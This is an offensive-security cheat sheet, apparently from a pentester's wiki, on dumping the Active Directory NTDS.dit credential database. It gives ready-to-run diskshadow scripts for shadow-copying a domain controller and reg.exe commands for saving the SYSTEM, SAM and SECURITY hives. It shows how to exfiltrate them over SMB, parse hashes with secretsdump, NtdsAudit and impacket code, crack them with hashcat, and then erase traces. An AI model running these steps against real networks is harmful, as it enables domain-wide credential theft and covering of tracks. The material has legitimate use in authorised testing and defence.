# NTDS

* <https://trustedsec.com/blog/exploring-ntds-dit-part-1-cracking-the-surface-with-dit-explorer>

## Shadow Disk

### Create via Diskshadow

Locate `diskshadow.exe`:

```
cmd /c where /R C:\ diskshadow.exe
```

Create a shadow disk:

```
cd \Windows\Temp
powershell -c "Add-Content add_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content add_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content add_vol.txt 'set verbose on'"
powershell -c "Add-Content add_vol.txt 'begin backup'"
powershell -c "Add-Content add_vol.txt 'add volume c: alias DCROOT'"
powershell -c "Add-Content add_vol.txt 'create'"
powershell -c "Add-Content add_vol.txt 'expose %DCROOT% w:'"
powershell -c "Add-Content add_vol.txt 'end backup'"
cmd /c diskshadow.exe /s add_vol.txt
```

{% code title="add\_vol.txt" %}

```
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
begin backup
add volume c: alias DCROOT
create
expose %DCROOT% w:
end backup
```

{% endcode %}

### Exfiltrate over SMB

Create a network share with anonymous access and put there all we need:

```
cd \Windows\Temp
copy w:\Windows\NTDS\ntds.dit ntds.dit
cmd /c reg.exe save hklm\system system.hive
cmd /c reg.exe save hklm\sam sam.hive
cmd /c reg.exe save hklm\security security.hive
```

Connect to the share and grab the files:

```
$ smbclient.py MEGACORP/administrator:'Passw0rd!'@192.168.1.11
use C$
cd windows/temp
get ntds.dit
get system.hive
get sam.hive
get security.hive
```

### Clean Up

Remove the shadow volume:

```
cd \Windows\Temp
powershell -c "Add-Content delete_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content delete_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content delete_vol.txt 'set verbose on'"
powershell -c "Add-Content delete_vol.txt 'unexpose w:'"
powershell -c "Add-Content delete_vol.txt 'delete shadows volume c:'"
powershell -c "Add-Content delete_vol.txt 'reset'"
cmd /c diskshadow.exe /s delete_vol.txt
```

{% code title="delete\_vol.txt" %}

```
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
unexpose w:
delete shadows volume c:
reset
```

{% endcode %}

Remove the share and all the traces:

```
cd \Windows\Temp
rm ntds.dit
rm system.hive
rm sam.hive
rm security.hive
rm C:\Windows\Temp\meta.cab
rm add_vol.txt
rm delete_vol.txt
```

## Raw NTDS.dit Copy

* <https://github.com/3gstudent/ntfsDump>
* <https://github.com/RedCursorSecurityConsulting/NTFSCopy>

Obtain a copy of NTDS.dit:

```
PS > Invoke-NTFSCopy C:\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit
```

Parse on-site in conjunction with [NtdsAudit](https://github.com/dionach/NtdsAudit/releases):

```
PS > esentutl.exe /p "C:\Windows\Temp\ntds.dit" /!10240 /8 /o
PS > reg.exe save HKLM\SYSTEM system.hive
PS > .\NtdsAudit.exe ntds.dit -s system.hive -p hashes.txt -u users.csv --dump-reversible cleartext.txt
```

Parse on-site in conjunction with [secretsdump.exe](https://github.com/Qazeer/OffensivePythonPipeline/blob/main/binaries/impacket/secretsdump_windows.exe):

```python
from binascii import hexlify
from impacket.smbconnection import SMBConnection
from impacket.examples.secretsdump import RemoteOperations
hostname = 'DC01.megacorp.local'
username = 'snovvcrash'
password = '<PASSWORD>'
nthash = '' if password else '<NTHASH>'
domain = hostname.split('.', 1)[1]
smbConn = SMBConnection(remoteName=hostname, remoteHost=hostname)
smbConn.login(user=username, password=password, domain=domain, nthash=nthash)
remOps = RemoteOperations(smbConnection=smbConn, doKerberos=False)
remOps.enableRegistry()
bootKey = remOps.getBootKey()
print(hexlify(bootKey).decode())
remOps.finish()
# .\secretsdump.exe LOCAL -ntds C:\Windows\Temp\ntds.dit -bootkey <BOOTKEY>
```

## Parse NTDS.dit

Parse with [secretsdump.py](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py):

```
$ secretsdump.py [-pwd-last-set] [-user-status] [-history] -sam sam.hive -system system.hive -security security.hive -ntds ntds.dit LOCAL > ntds.txt
$ cat ntds.txt | grep -a aad3b | grep -i 'Status=Enabled' | grep -v 31d6c | grep -v -e '\$' -e '{' -e '}' -e HealthMailbox | awk -F: '{print $1":"$4}' | sort -u > ntds.in
$ hashcat -m 1000 -a 0 -w 3 -O --session=ntds -o ntds.out ntds.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
```

Parse with [aesedb](https://github.com/skelsec/aesedb) (faster but less informative):

```
$ antdsparse <BOOTKEY> ntds.dit -o ntds.txt --progress
$ antdsparse system.hive ntds.dit -o ntds.txt --progress
```

Parse with ntdissector:

* <https://www.synacktiv.com/publications/introducing-ntdissector-a-swiss-army-knife-for-your-ntdsdit-files>
* <https://github.com/synacktiv/ntdissector>

### Reversible Encryption

* <https://adsecurity.org/?p=2053>
* <https://www.blackhillsinfosec.com/how-i-cracked-a-128-bit-password/>

Check if enabled globally:

* gpmc.msc > Default Domain Policy > *Computer Configuration* > *Policies* > *Windows Settings* > *Security Settings* > *Account Policies* > *Password Policy* > *Store passwords using reversible encryption* > *Enabled* ✔

Check if enabled for specific users:

```
PS > Get-ADUser -Filter {userAccountControl -band 128} -Properties userAccountControl | ft name,samAccountName,userAccountControl | tee users-revenc.txt
```

{% hint style="info" %}
When DCSyncing such users, a cleartext password will be obtained.
{% endhint %}

## Tools

* <https://github.com/dionach/NtdsAudit>
* <https://github.com/MichaelGrafnetter/DSInternals>